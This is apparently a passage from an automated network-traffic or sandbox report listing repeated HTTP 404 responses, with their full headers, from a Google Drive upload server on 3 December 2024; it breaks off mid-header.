Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:23 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-KNI-Teaqz8V2xSJeDX3NsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7GmGIfpUg2Ify1PaAvOUmIAwtFIitUAy0QmfOd9imZL-i3uCz6OpPDeqsJpmkgu-9hSPPzRfQZsgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:29 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-OL1--5BaKnVjYlJAzZJb9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC4VhU31ORDUXpE0CLbuQ5mCrmXeCnJ8qgNojShjeVZr7Zh26PcVor7TPkpz_S9BsmTiZ-W4al45TQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:34 GMTContent-Security-Policy: script-src 'nonce-P5H0aHfPGSlumNyI8nhDiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC7I6SN12om3jzpykNrFOKJOawTPTvqtdMuyFBuTNvGA6oPEmOvYJ6uMR4dGOlfFAmmmeAVpE4IPLAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:40 GMTContent-Security-Policy: script-src 'nonce-p8EvI-82T8v5BjV7A92iNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5beLnL5QzQF8Ycy0R-t3P2FjfFgFniNT9o55-3xIOD0Q7Z9skv201rLe9F1hF3wT0PorXc6kUIcgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:45 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-h6UIz2VSNNV4WndnJiCAmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC7rP1NHeXdQVUdi8CB0M2dXZ1NDnrOiy9uX11jSHRvd7us6dJzRfNVd376ScjnNpczzLvYLodsyIgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:51 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-E3SL-r0hctxHGFX8VRfLEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5GQWEqRgPNTFwzgx-9_mXkpGGwCjPNsEZAGTKOdiZ_SB30ExC_QLCu2cWBcizoe15JR8zRqYZ1oQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:57 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-mEk3TmjwGJzJy7oiUWC7ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7lxyRjYr-0TlRhywSH3PcboZ8zH1cYvAF2MlskU-v3ri_e0Y6qaySvDn-pJoWK23yAQw_h85bB3wServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:02 GMTContent-Security-Policy: script-src 'nonce-GUfdNp9Y8W4ROMNRSIx-ag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC6yOryCjVV3EbeUPRCxsjmBilTy1OBwe3mp30y50a8AhDz2NIny20i1IKUnw5xBzbDOM3sGq5LmLgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:08 GMTContent-Security-Policy: script-src 'nonce--MWVypKTJpvoZBJQG-DpWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5PnXHGCOH4U0tLIdcp2EiDEstZnrcLE95LsHQ4uhq0LTK1vFJqg7gPWO1Z38B4qI_NiL8vow_5rgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:13 GMTContent-Security-Policy: script-src 'nonce-qN0EOC1nkznqPMHC5H4CwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC6e3vQNlkqAnAUNL2HM9xixg4Q8hqxab00eFSxbfE0KmhrjA2tCiAHuc60PDK5w9p42DmKHsPTIdgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:19 GMTContent-Security-Policy: script-src 'nonce-uQnJiq9ftKYWIFgJSKS7ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC4KK_QXxtN71vNgIHyHNOnVpkJv2vMEDcGcsNKDoqjJKAyAlMXr4ryhn6sANgft83lIaHj9KmjXjAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:25 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-G1sjsUQBpFxkqgdo00w9rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5uR8lsNnRvlGgfeXXGdwzVFx5uF-sejHIkH3uXWr-l-67McK6aGeqJ8bUNyBtuk_oMZF5fRihGmAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:30 GMTContent-Security-Policy: script-src 'nonce-wQUTh5tMvCUH6jfTn9a2gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7aVP3m36V3K72LO1xnjhEHY_JxMjWLvId9f9M4AcNUKPUpG5zfVC-3iOGXpCe6tCHanTWSlTq95gServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:36 GMTContent-Security-Policy: script-src 'nonce-RJ_hvRnWK2g0YmNJJ1PXpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5xDYlQTK7BKyA1lXs-m8AlqWFk7LeiVOfjAc9BrL8Y85GpZOASDEEJN8t_2kivpJOUez9wttJsNwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:41 GMTContent-Security-Policy: script-src 'nonce-L9wWrCcO5xZIkLBXMP801A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC79xWUsHjucgOk9UYtEHnk-RcE_R5talxm5kmIUI3Nf1EiFH68-PN-ploq9UEiJ_7unKy2t-kMoxgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox 